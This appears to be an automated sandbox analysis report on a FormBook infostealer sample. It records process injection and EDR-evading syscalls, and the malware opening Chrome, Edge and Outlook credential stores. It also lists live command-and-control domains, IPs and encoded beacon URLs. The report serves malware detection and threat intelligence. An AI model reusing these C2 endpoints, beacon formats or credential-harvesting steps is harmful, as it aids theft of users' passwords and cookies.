            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.4128778951.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4128752269.0000000004BC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1888404688.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1886252240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4131107461.0000000004F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4122907990.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4126780482.0000000002730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1888965861.0000000006200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\RpcPing.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\RpcPing.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: N2Qncau2rN.exeBinary or memory string: WIN_XP
            Source: N2Qncau2rN.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
            Source: N2Qncau2rN.exeBinary or memory string: WIN_XPe
            Source: N2Qncau2rN.exeBinary or memory string: WIN_VISTA
            Source: N2Qncau2rN.exeBinary or memory string: WIN_7
            Source: N2Qncau2rN.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.4128778951.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4128752269.0000000004BC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1888404688.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1886252240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4131107461.0000000004F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4122907990.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4126780482.0000000002730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1888965861.0000000006200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		2
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS16
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets141
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1529035 Sample: N2Qncau2rN.exe Startdate: 08/10/2024 Architecture: WINDOWS Score: 100 28 www.demovix.xyz 2->28 30 www.broomeorchard.xyz 2->30 32 24 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 3 other signatures 2->50 10 N2Qncau2rN.exe 1 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 66 Switches to a custom stack to bypass stack traces 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 auuGcaPMTDojV.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 RpcPing.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 auuGcaPMTDojV.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.drivedoge.website 195.161.68.8, 60856, 60857, 60858 RTCOMM-ASRU Russian Federation 22->34 36 www.shanhaiguan.net 156.242.132.82, 60844, 60845, 60846 POWERLINE-AS-APPOWERLINEDATACENTERHK Seychelles 22->36 38 8 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            N2Qncau2rN.exe71%ReversingLabsWin32.Backdoor.FormBook
            N2Qncau2rN.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.palcoconnector.net
            		208.91.197.27
            		truetrue
              		unknown
              www.broomeorchard.xyz
              		15.197.204.56
              		truetrue
                		unknown
                promasterev.shop
                		3.33.130.190
                		truetrue
                  		unknown
                  wcq24.top
                  		154.23.184.240
                  		truetrue
                    		unknown
                    es-lidl.online
                    		84.32.84.32
                    		truetrue
                      		unknown
                      www.drivedoge.website
                      		195.161.68.8
                      		truetrue
                        		unknown
                        www.demovix.xyz
                        		199.192.19.19
                        		truetrue
                          		unknown
                          animekuid.xyz
                          		203.175.9.128
                          		truetrue
                            		unknown
                            cdl-lb-1356093980.us-east-1.elb.amazonaws.com
                            		3.91.127.116
                            		truetrue
                              		unknown
                              doggieradio.net
                              		3.33.130.190
                              		truetrue
                                		unknown
                                www.torex33.online
                                		194.58.112.174
                                		truetrue
                                  		unknown
                                  childlesscatlady.today
                                  		3.33.130.190
                                  		truetrue
                                    		unknown
                                    www.falconclub.online
                                    		74.208.236.25
                                    		truetrue
                                      		unknown
                                      www.shanhaiguan.net
                                      		156.242.132.82
                                      		truetrue
                                        		unknown
                                        multileveltravel.world
                                        		3.33.130.190
                                        		truetrue
                                          		unknown
                                          www.es-lidl.online
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.animekuid.xyz
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.mtcep.org
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.doggieradio.net
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.wcq24.top
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.multileveltravel.world
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.childlesscatlady.today
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        206.23.85.13.in-addr.arpa
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown
                                                          www.wajf.net
                                                          		unknown
                                                          		unknowntrue
                                                            		unknown
                                                            www.promasterev.shop
                                                            		unknown
                                                            		unknowntrue
                                                              		unknown

                                                              Contacted URLs

                                                              NameMaliciousAntivirus DetectionReputation
                                                              http://www.shanhaiguan.net/b6g5/true
                                                                		unknown
                                                                http://www.palcoconnector.net/bnrz/true
                                                                  		unknown
                                                                  http://www.wajf.net/eoqq/true
                                                                    		unknown
                                                                    http://www.shanhaiguan.net/b6g5/?tpTd=a8QqMioE13Jt2iPiOClkfJLiI6soJM7xy7KAtya8ruOCNgqe2jC0xyltzPPw7ePD7gDMaG5P8Bx9i7otBFrSmSNv5WmdoflN7m2YOZj8dE3cyj5SIw==&WX=rnWllP5PLlhLLtjtrue
                                                                      		unknown
                                                                      http://www.falconclub.online/sld7/?tpTd=/serfU6kaxhlkkJx8dOr0qlSRXA+6La0KEB68G6jbYfyT6z2zvVJBFhkOYA104kn6FRHm7lAc7gn2TRu9DlziYvx9tC/5P1WJl131MkdoxRdpo/lsw==&WX=rnWllP5PLlhLLtjtrue
                                                                        		unknown
                                                                        http://www.doggieradio.net/szy7/?tpTd=K8R7SnSfb7dli3eXRAD3SnntsVSSj1ZCjsRlCzIsDWJUxclcgzVYTq7f6N7/UKjTBpPX3WVoPH/v0tj5Dmk2jiKrkd/jwL9iqNrnd9yIGgMT9MzICA==&WX=rnWllP5PLlhLLtjtrue
                                                                          		unknown
                                                                          http://www.palcoconnector.net/bnrz/?tpTd=OQxwzbuOtqgqEYELNcMucZtHnRjB34c8S/VejUlVZtuveUVj7y4E7KtMGd+fy1MLwhM03wpJ8ksC3Umpmq48p+wh68NaozaF8Wex7USlPt5ZhMWe3g==&WX=rnWllP5PLlhLLtjtrue
                                                                            		unknown
                                                                            http://www.demovix.xyz/azuc/true
                                                                              		unknown
                                                                              http://www.promasterev.shop/abrg/true
                                                                                		unknown
                                                                                http://www.falconclub.online/sld7/true
                                                                                  		unknown
                                                                                  http://www.demovix.xyz/azuc/?WX=rnWllP5PLlhLLtj&tpTd=IEG0cbQocDdgsf0hXa+uAMZkMIV+L9dmDWmvXBjU8TDCB1WiaKjeRQjMK7ZBG/72TlyV3qB8EHQj0nSZZfMRzC5BhxJ3N2wZ76F+LQzPhJ8EwwRHzQ==true
                                                                                    		unknown
                                                                                    http://www.wajf.net/eoqq/?tpTd=WfaN7QdSX3VNxg1q9fkfNv4hQq9KYwkNivs6k+R5An5RjxagqDfSiLpQ7QxvwrMnBdqTEtPHhZ8GpglWyWgxMX7+0Hc5PxIPKPsdiKxnaB1g3ZY6yQ==&WX=rnWllP5PLlhLLtjtrue
                                                                                      		unknown
                                                                                      http://www.promasterev.shop/abrg/?WX=rnWllP5PLlhLLtj&tpTd=GnAJmiRPPiyH2TmfuBVnsZoXdGf0FUPFySgQhtVOM4GwnDq9Dnvh9ePCWYtJxLLAU+yG0d2c2V85YMiF3u+CH4Whw+Z8K8Lme5ABmnpnJdsWz6g8ww==true
                                                                                        		unknown
                                                                                        http://www.animekuid.xyz/7un9/?tpTd=4XOwgplivDvk/EZOubh+oM7E4qBWP2ACvZmroFPOKBmtqB+PCSuAHgoGD1T4VUWf5wIO7JPBcjeVh4zPUWd0ua1JHgAe3g4A1TGkBV6DNuNtOYfRKw==&WX=rnWllP5PLlhLLtjtrue
                                                                                          		unknown
                                                                                          http://www.drivedoge.website/c6cw/?WX=rnWllP5PLlhLLtj&tpTd=FqG002IG5EdskeSYnMZEmsgm4M8u04DOLE26DOOOZGkEYfdt2aoEMjGd+Okidkvsa7u+peDvqMbFWL8Zvpj7qkQAFbZLww+9EwijpyIUD9D3/88cfw==true
                                                                                            		unknown
                                                                                            http://www.doggieradio.net/szy7/true
                                                                                              		unknown
                                                                                              http://www.animekuid.xyz/7un9/true
                                                                                                		unknown
                                                                                                http://www.childlesscatlady.today/itly/?tpTd=tsSBdLA6gv84Y8GcYug/jDCyCw8YLYxClZSiOA0GXKnW8CsuEbQ9YFwfaGPSJlWcPZlV2TdpOPQww8tdSTouVEB2Caqu0WVs/8KUUJONnONwfAEA0g==&WX=rnWllP5PLlhLLtjtrue
                                                                                                  		unknown
                                                                                                  http://www.es-lidl.online/n2dv/?tpTd=bOYvUT8qr4FCBQL4q+W2EOsk7MURICY42o+fYfsEfk4vvxNQfURJ5XqGAnjP2wivb2XfCAEuS6lNjanH3pgkh9rgu/pEJ/+PKIa4gq6/Dbg2n2byoA==&WX=rnWllP5PLlhLLtjtrue
                                                                                                    		unknown
                                                                                                    http://www.multileveltravel.world/hfue/?WX=rnWllP5PLlhLLtj&tpTd=GzF3o7eza1dU4F476cHHeral/cYJG+FCwgJMIz0HPlfrSCMBDVuQfjGNmxBd7moVrhCGY2hY7MCgK+MnekgstTp0z3ZjcP9rk68ek43BHqQDCfcAeg==true
                                                                                                      		unknown
                                                                                                      http://www.childlesscatlady.today/itly/true
                                                                                                        		unknown
                                                                                                        http://www.torex33.online/hd7m/?tpTd=sLbEVsfW73VtVB0Jvj7gC+ceEVX4meQWoUuArYo60q3nO/kAxb5tEPXYoxmPYHkEXIEIOfWFMW/cSWDV+KoY2jgQgwLtxzjq6i8n+9HhH6xOpB1tMw==&WX=rnWllP5PLlhLLtjtrue
                                                                                                          		unknown
                                                                                                          http://www.es-lidl.online/n2dv/true
                                                                                                            		unknown
                                                                                                            http://www.drivedoge.website/c6cw/true
                                                                                                              		unknown
                                                                                                              http://www.torex33.online/hd7m/true
                                                                                                                		unknown

                                                                                                                URLs from Memory and Binaries

                                                                                                                NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                https://duckduckgo.com/chrome_newtabRpcPing.exe, 00000005.00000003.2078909862.000000000766D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefixRpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  https://dts.gnpge.comauuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    https://duckduckgo.com/ac/?q=RpcPing.exe, 00000005.00000003.2078909862.000000000766D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    https://reg.ruRpcPing.exe, 00000005.00000002.4129603004.0000000004AAE000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.00000000043AE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      http://i1.cdn-image.com/__media__/pics/29590/bg1.png)RpcPing.exe, 00000005.00000002.4131706489.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        http://www.palcoconnector.net/Wire_Connectors.cfm?fp=c6vU2rntkHymqt5x3kJq4vMX0U8fOmaM0f8rwBVXAAN39JiRpcPing.exe, 00000005.00000002.4131706489.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          http://www.palcoconnector.net/__media__/js/trademark.php?d=palcoconnector.net&type=nsRpcPing.exe, 00000005.00000002.4131706489.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            https://cdn.consentmanager.netRpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.cssRpcPing.exe, 00000005.00000002.4129603004.0000000003FB0000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.00000000038B0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=RpcPing.exe, 00000005.00000003.2078909862.000000000766D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  http://www.palcoconnector.net/Ntsc_Pal_Adapter.cfm?fp=c6vU2rntkHymqt5x3kJq4vMX0U8fOmaM0f8rwBVXAAN39JRpcPing.exe, 00000005.00000002.4131706489.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    https://www.reg.ru/web-sites/?utm_source=www.torex33.online&utm_medium=parking&utm_campaign=s_land_cRpcPing.exe, 00000005.00000002.4129603004.0000000004AAE000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.00000000043AE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regularRpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        http://i1.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpgRpcPing.exe, 00000005.00000002.4131706489.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eotRpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            https://www.reg.ru/domain/new/?utm_source=www.torex33.online&utm_medium=parking&utm_campaign=s_land_RpcPing.exe, 00000005.00000002.4129603004.0000000004AAE000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.00000000043AE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otfRpcPing.exe, 00000005.00000002.4131706489.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefixRpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRpcPing.exe, 00000005.00000003.2078909862.000000000766D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  		unknown
                                                                                                                                                  http://www.palcoconnector.net/__media__/design/underconstructionnotice.php?d=palcoconnector.netRpcPing.exe, 00000005.00000002.4131706489.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                    		unknown
                                                                                                                                                    https://www.reg.ru/dedicated/?utm_source=www.torex33.online&utm_medium=parking&utm_campaign=s_land_sRpcPing.exe, 00000005.00000002.4129603004.0000000004AAE000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.00000000043AE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otfRpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                        		unknown
                                                                                                                                                        http://i1.cdn-image.com/__media__/pics/28903/search.png)RpcPing.exe, 00000005.00000002.4131706489.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.cssRpcPing.exe, 00000005.00000002.4129603004.0000000003FB0000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.00000000038B0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                            		unknown
